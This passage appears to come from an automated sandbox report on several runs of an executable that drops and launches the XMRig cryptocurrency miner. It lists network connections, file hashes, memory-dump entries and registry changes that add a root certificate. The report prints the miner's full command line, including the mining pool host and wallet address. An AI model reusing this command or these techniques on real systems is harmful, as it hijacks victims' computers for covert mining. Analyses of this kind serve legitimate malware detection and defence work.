| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.109.69.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3368 wrote to memory of 3928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3368 wrote to memory of 3928 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3928-62-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-63-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-64-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-65-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-66-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-67-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-68-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-69-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-70-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-71-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-72-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-73-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-74-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-75-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-76-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-77-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-78-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-79-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-80-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-81-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-82-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-83-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
memory/3928-84-0x00007FF697CA0000-0x00007FF6987A3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3884 wrote to memory of 3960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3884 wrote to memory of 3960 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3960-16-0x000001C2AB930000-0x000001C2AB950000-memory.dmp
memory/3960-17-0x000001C2AB970000-0x000001C2AB990000-memory.dmp
memory/3960-18-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-20-0x000001C2AD270000-0x000001C2AD290000-memory.dmp
memory/3960-19-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp
memory/3960-21-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-22-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-25-0x000001C2AD270000-0x000001C2AD290000-memory.dmp
memory/3960-24-0x000001C2AB990000-0x000001C2AB9B0000-memory.dmp
memory/3960-23-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-26-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-27-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-28-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-29-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-30-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-31-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-32-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-33-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-34-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-35-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-36-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-37-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-38-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-39-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-40-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-41-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-42-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-43-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-44-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-45-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-46-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-47-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-48-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-49-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-50-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-51-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-52-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-53-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-54-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-55-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-56-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-57-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-58-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-59-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-60-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-61-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-62-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-63-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-64-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-65-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-66-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-67-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-68-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-69-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-70-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-71-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-72-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-73-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-74-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-75-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-76-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-77-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-78-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-79-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-80-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-81-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-82-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-83-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
memory/3960-84-0x00007FF64D4D0000-0x00007FF64DFD3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2164 wrote to memory of 2252 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2252-16-0x000001E9223E0000-0x000001E922400000-memory.dmp
memory/2252-17-0x000001E923DE0000-0x000001E923E00000-memory.dmp
memory/2252-18-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-19-0x000001E923E00000-0x000001E923E20000-memory.dmp
memory/2252-20-0x000001E923E20000-0x000001E923E40000-memory.dmp
memory/2252-21-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-22-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-25-0x000001E923E20000-0x000001E923E40000-memory.dmp
memory/2252-24-0x000001E923E00000-0x000001E923E20000-memory.dmp
memory/2252-23-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-26-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-27-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-28-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-29-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-30-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-31-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-32-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-33-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-34-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-35-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-36-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-37-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-38-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-39-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-40-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-41-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-42-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-43-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-44-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-45-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-46-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-47-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-48-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-49-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-50-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-51-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-52-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-53-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-54-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-55-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-56-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-57-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-58-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-59-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-60-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-61-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-62-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-63-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-64-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-65-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-66-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-67-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-68-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-69-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-70-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-71-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-72-0x00007FF784160000-0x00007FF784C63000-memory.dmp
memory/2252-73-0x00007FF784160000-0x00007FF784C63000-memory.dmp
